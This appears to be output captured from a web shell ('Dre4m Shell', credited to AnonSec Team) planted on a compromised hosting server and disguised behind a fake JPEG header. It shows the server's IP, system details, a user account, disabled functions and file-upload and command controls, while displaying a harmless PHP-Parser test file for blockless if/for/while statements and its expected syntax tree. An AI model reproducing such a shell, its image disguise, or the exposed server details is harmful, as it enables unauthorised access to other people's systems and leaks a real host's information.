ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.141.47.95
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/nicnAdmin/vendor/nikic/php-parser/test/code/parser/stmt/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/nicnAdmin/vendor/nikic/php-parser/test/code/parser/stmt//blocklessStatement.test
Blockless statements for if/for/etc
-----
<?php

if ($a) $A;
elseif ($b) $B;
else $C;

for (;;) $foo;

foreach ($a as $b) $AB;

while ($a) $A;

do $A; while ($a);

declare (a='b') $C;
-----
array(
    0: Stmt_If(
        cond: Expr_Variable(
            name: a
        )
        stmts: array(
            0: Expr_Variable(
                name: A
            )
        )
        elseifs: array(
            0: Stmt_ElseIf(
                cond: Expr_Variable(
                    name: b
                )
                stmts: array(
                    0: Expr_Variable(
                        name: B
                    )
                )
            )
        )
        else: Stmt_Else(
            stmts: array(
                0: Expr_Variable(
                    name: C
                )
            )
        )
    )
    1: Stmt_For(
        init: array(
        )
        cond: array(
        )
        loop: array(
        )
        stmts: array(
            0: Expr_Variable(
                name: foo
            )
        )
    )
    2: Stmt_Foreach(
        expr: Expr_Variable(
            name: a
        )
        keyVar: null
        byRef: false
        valueVar: Expr_Variable(
            name: b
        )
        stmts: array(
            0: Expr_Variable(
                name: AB
            )
        )
    )
    3: Stmt_While(
        cond: Expr_Variable(
            name: a
        )
        stmts: array(
            0: Expr_Variable(
                name: A
            )
        )
    )
    4: Stmt_Do(
        cond: Expr_Variable(
            name: a
        )
        stmts: array(
            0: Expr_Variable(
                name: A
            )
        )
    )
    5: Stmt_Declare(
        declares: array(
            0: Stmt_DeclareDeclare(
                key: a
                value: Scalar_String(
                    value: b
                )
            )
        )
        stmts: array(
            0: Expr_Variable(
                name: C
            )
        )
    )
)

Anon7 - 2022
AnonSec Team